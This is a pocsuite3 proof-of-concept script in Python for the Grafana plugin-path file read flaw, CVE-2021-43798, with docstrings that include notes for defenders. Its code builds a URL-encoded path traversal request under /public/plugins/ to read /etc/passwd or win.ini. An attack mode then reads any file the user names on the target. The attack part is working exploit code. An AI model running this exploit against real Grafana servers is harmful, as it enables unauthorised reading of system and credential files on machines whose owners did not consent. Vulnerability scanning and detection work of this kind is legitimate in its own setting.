Grafana plugins 任意文件读取漏洞 CVE-2021-43798.py
from pocsuite3.lib.core.data import logger
from collections import OrderedDict
from urllib.parse import urljoin
from requests.exceptions import ReadTimeout
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, REVERSE_PAYLOAD, OptString, OptItems, OptDict, VUL_TYPE
from pocsuite3.lib.utils import get_middle_text
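class DemoPOC(POCBase):
    """pocsuite3 check for the Grafana plugin-path file read (CVE-2021-43798).

    The check sends one GET to ``/public/plugins/<plugin>/`` followed by a
    run of URL-encoded ``..%2f`` segments and a file path, then inspects the
    response body.

    Notes for defenders:
      * Detection: the request line is distinctive. Look in Grafana or
        reverse-proxy access logs for paths under ``/public/plugins/`` that
        contain ``..%2f`` (or a decoded ``../``).
      * Mitigation: upgrade Grafana to a release the vendor advisory for
        this CVE lists as fixed. ``appVersion`` below is a coarse range, not
        an authoritative list of affected builds.
      * Results: ``VerifyInfo['Response']`` holds the raw file content
        returned by the target, so treat saved scan output as sensitive.
    """

    vulID = '6'
    name = 'Grafana plugins 任意文件读取漏洞 CVE-2021-43798'
    # desc (translated): Grafana has an arbitrary file read vulnerability; a
    # crafted request through a plugin that exists by default can read any
    # file on the server.
    desc = '''Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件'''
    appName = 'Grafana'
    appVersion = '<= 8.x'
    samples = []
    install_requires = ['']
    # NOTE(review): the flaw is a path traversal / file read rather than a
    # path disclosure; confirm which VUL_TYPE member fits best.
    vulType = VUL_TYPE.PATH_DISCLOSURE
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _options(self):
        """Declare the user-settable options for this check.

        Returns:
            OrderedDict with ``system`` (marker file per OS, used by
            ``_verify``), ``plugin`` (plugin id placed in the URL) and
            ``filename`` (file path used by ``_attack``).
        """
        o = OrderedDict()
        system = {
            "Windows": "c:/windows/win.ini",
            "Linux": "/etc/passwd",
        }
        o["system"] = OptDict(default=system, selected="Linux")
        # description (translated): plugin name
        o["plugin"] = OptString("welcome", description='插件名')
        # description (translated): "custom command for file reading"; the
        # value is used as a file path, not as a command.
        o["filename"] = OptString("/etc/passwd", description='文件读取自定义命令')
        return o

    def _fetch(self, path):
        """Request ``path`` through the plugin route.

        Args:
            path: file path appended after the encoded traversal segments.

        Returns:
            ``(target, response)``; ``response`` is ``None`` when the
            request raised.
        """
        target = self.url + "/public/plugins/" + self.get_option("plugin") + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.." + path
        logger.info("requesting %s", target)
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
        }
        try:
            return target, requests.get(url=target, headers=headers, timeout=5)
        except Exception as exc:
            # Best effort: an unreachable or slow target is reported as "not
            # vulnerable", but the reason is logged instead of being dropped.
            # Catching Exception (not a bare except) lets Ctrl-C through.
            logger.warning("request to %s failed: %s", target, exc)
            return target, None

    def _verify(self):
        """Check whether the target returns a well-known marker file.

        A hit requires HTTP 200 and a body containing ``root:`` or
        ``for 16-bit app support``. These are plain substring checks, so a
        page that merely contains one of the strings also matches.

        Returns:
            The ``Output`` built by ``parse_output``.
        """
        result = {}
        path = self.get_option("system")
        target, r = self._fetch(path)
        if r is not None and r.status_code == 200 and ('root:' in r.text or 'for 16-bit app support' in r.text):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
            result['VerifyInfo']['File'] = path
            result['VerifyInfo']['Response'] = r.text
        return self.parse_output(result)

    def _attack(self):
        """Request the file named by the ``filename`` option.

        Any HTTP 200 counts as success; the body is not inspected, so an
        error page served with status 200 is also reported as a hit.

        Returns:
            The ``Output`` built by ``parse_output``.
        """
        result = {}
        path = self.get_option("filename")
        # The request goes to the URL built for this call. The earlier code
        # referenced an undefined name ``url`` and raised NameError before
        # any request was sent.
        target, r = self._fetch(path)
        if r is not None and r.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
            result['VerifyInfo']['File'] = path
            result['VerifyInfo']['Response'] = r.text
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``.

        An empty ``result`` is reported as a failure with the message
        ``target is not vulnerable``; a non-empty one as a success.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output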
# Hand the class to pocsuite3 so the framework can load and run it.
register_poc(DemoPOC)